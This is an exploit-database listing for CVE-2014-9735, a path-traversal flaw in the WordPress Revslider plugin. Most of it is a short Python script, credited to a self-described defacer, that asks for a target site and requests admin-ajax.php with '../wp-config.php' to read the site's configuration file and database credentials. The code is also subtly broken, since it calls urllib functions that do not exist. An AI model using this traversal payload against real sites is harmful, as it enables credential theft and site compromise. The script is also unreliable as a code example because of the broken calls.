Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2014-9735 | CWE-20 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | Critical | Remote | 2021-09-27 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L | 0.02113 | 0.21 |
################################# # Exploit Title: WordPress Revslider Exploit Grab Config # Author: Xale [ Turkish Defacer ] # Date: 27.09.2021 # Greetz: BetLex & Qualwin & Deus Lorenzo & GaskmanTR & 0X4-Team # Tested On: Kali Linux # Risk: Medium - High ################################## Coded With Python revslider.py import os import urllib.request os.system("sudo apt-get install figlet") os.system("clear") os.system("figlet XALE") print(" ") print("Revslider Exploit | Grab Config | Coded By Xale") print(" ") targets = input("Target WordPress Site: (Sample: example.com) ") target = targets + "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php" htm = urllib.request.open(target) print("Grabbed Config: (Connect: Adminer)") print(" ") print(htm.open()) GitHub: https://github.com/xaletr/RevSlider-Exploit
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.